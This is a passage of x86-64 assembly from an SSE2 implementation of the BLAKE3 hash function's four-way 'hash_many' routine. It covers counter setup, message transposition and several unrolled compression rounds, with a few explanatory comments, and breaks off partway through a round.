blake3_hash_many_sse2:
_CET_ENDBR
push r15
push r14
push r13
push r12
push rbx
push rbp
mov rbp, rsp
sub rsp, 360
and rsp, 0xFFFFFFFFFFFFFFC0
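# Align the scratch area down to 64 bytes so the movdqa spills below stay aligned.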
neg r9d
movd xmm0, r9d
pshufd xmm0, xmm0, 0x00
movdqa xmmword ptr [rsp+0x130], xmm0
movdqa xmm1, xmm0
pand xmm1, xmmword ptr [ADD0+rip]
pand xmm0, xmmword ptr [ADD1+rip]
movdqa xmmword ptr [rsp+0x150], xmm0
movd xmm0, r8d
pshufd xmm0, xmm0, 0x00
paddd xmm0, xmm1
movdqa xmmword ptr [rsp+0x110], xmm0
pxor xmm0, xmmword ptr [CMP_MSB_MASK+rip]
pxor xmm1, xmmword ptr [CMP_MSB_MASK+rip]
pcmpgtd xmm1, xmm0
shr r8, 32
movd xmm2, r8d
pshufd xmm2, xmm2, 0x00
psubd xmm2, xmm1
movdqa xmmword ptr [rsp+0x120], xmm2
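# [rsp+0x110]/[rsp+0x120] now hold the four lanes' low/high counter words.
# The xor-with-0x80000000 plus pcmpgtd above is an unsigned-overflow check:
# it detects carry out of the 32-bit low-word add and propagates it into the
# high words.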
mov rbx, qword ptr [rbp+0x50]
mov r15, rdx
shl r15, 6
movzx r13d, byte ptr [rbp+0x38]
movzx r12d, byte ptr [rbp+0x48]
cmp rsi, 4
jc 3f
2:
movdqu xmm3, xmmword ptr [rcx]
pshufd xmm0, xmm3, 0x00
pshufd xmm1, xmm3, 0x55
pshufd xmm2, xmm3, 0xAA
pshufd xmm3, xmm3, 0xFF
movdqu xmm7, xmmword ptr [rcx+0x10]
pshufd xmm4, xmm7, 0x00
pshufd xmm5, xmm7, 0x55
pshufd xmm6, xmm7, 0xAA
pshufd xmm7, xmm7, 0xFF
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
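# eax carries the per-block flags: the start flags ([rbp+0x40]) were or'ed in
# above only for the first block, and the end flags (r12d) only survive the
# cmovne below on the final block.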
9:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
movdqu xmm8, xmmword ptr [r8+rdx-0x40]
movdqu xmm9, xmmword ptr [r9+rdx-0x40]
movdqu xmm10, xmmword ptr [r10+rdx-0x40]
movdqu xmm11, xmmword ptr [r11+rdx-0x40]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp], xmm8
movdqa xmmword ptr [rsp+0x10], xmm9
movdqa xmmword ptr [rsp+0x20], xmm12
movdqa xmmword ptr [rsp+0x30], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x30]
movdqu xmm9, xmmword ptr [r9+rdx-0x30]
movdqu xmm10, xmmword ptr [r10+rdx-0x30]
movdqu xmm11, xmmword ptr [r11+rdx-0x30]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x40], xmm8
movdqa xmmword ptr [rsp+0x50], xmm9
movdqa xmmword ptr [rsp+0x60], xmm12
movdqa xmmword ptr [rsp+0x70], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x20]
movdqu xmm9, xmmword ptr [r9+rdx-0x20]
movdqu xmm10, xmmword ptr [r10+rdx-0x20]
movdqu xmm11, xmmword ptr [r11+rdx-0x20]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0x80], xmm8
movdqa xmmword ptr [rsp+0x90], xmm9
movdqa xmmword ptr [rsp+0xA0], xmm12
movdqa xmmword ptr [rsp+0xB0], xmm13
movdqu xmm8, xmmword ptr [r8+rdx-0x10]
movdqu xmm9, xmmword ptr [r9+rdx-0x10]
movdqu xmm10, xmmword ptr [r10+rdx-0x10]
movdqu xmm11, xmmword ptr [r11+rdx-0x10]
movdqa xmm12, xmm8
punpckldq xmm8, xmm9
punpckhdq xmm12, xmm9
movdqa xmm14, xmm10
punpckldq xmm10, xmm11
punpckhdq xmm14, xmm11
movdqa xmm9, xmm8
punpcklqdq xmm8, xmm10
punpckhqdq xmm9, xmm10
movdqa xmm13, xmm12
punpcklqdq xmm12, xmm14
punpckhqdq xmm13, xmm14
movdqa xmmword ptr [rsp+0xC0], xmm8
movdqa xmmword ptr [rsp+0xD0], xmm9
movdqa xmmword ptr [rsp+0xE0], xmm12
movdqa xmmword ptr [rsp+0xF0], xmm13
movdqa xmm9, xmmword ptr [BLAKE3_IV_1+rip]
movdqa xmm10, xmmword ptr [BLAKE3_IV_2+rip]
movdqa xmm11, xmmword ptr [BLAKE3_IV_3+rip]
movdqa xmm12, xmmword ptr [rsp+0x110]
movdqa xmm13, xmmword ptr [rsp+0x120]
movdqa xmm14, xmmword ptr [BLAKE3_BLOCK_LEN+rip]
movd xmm15, eax
pshufd xmm15, xmm15, 0x00
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
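# All 7 rounds are fully unrolled below; the transposed message words live at
# [rsp]..[rsp+0xF0] and the BLAKE3 message schedule is baked into the load
# offsets of each round.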
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x40]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [BLAKE3_IV_0+rip]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x80]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
pshuflw xmm15, xmm15, 0xB1
pshufhw xmm15, xmm15, 0xB1
pshuflw xmm12, xmm12, 0xB1
pshufhw xmm12, xmm12, 0xB1
pshuflw xmm13, xmm13, 0xB1
pshufhw xmm13, xmm13, 0xB1
pshuflw xmm14, xmm14, 0xB1
pshufhw xmm14, xmm14, 0xB1
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmm15
psrld xmm15, 8
pslld xmm8, 24
pxor xmm15, xmm8
movdqa xmm8, xmm12
psrld xmm12, 8
pslld xmm8, 24
pxor xmm12, xmm8
movdqa xmm8, xmm13
psrld xmm13, 8
pslld xmm8, 24
pxor xmm13, xmm8
movdqa xmm8, xmm14
psrld xmm14, 8
pslld xmm8, 24
pxor xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
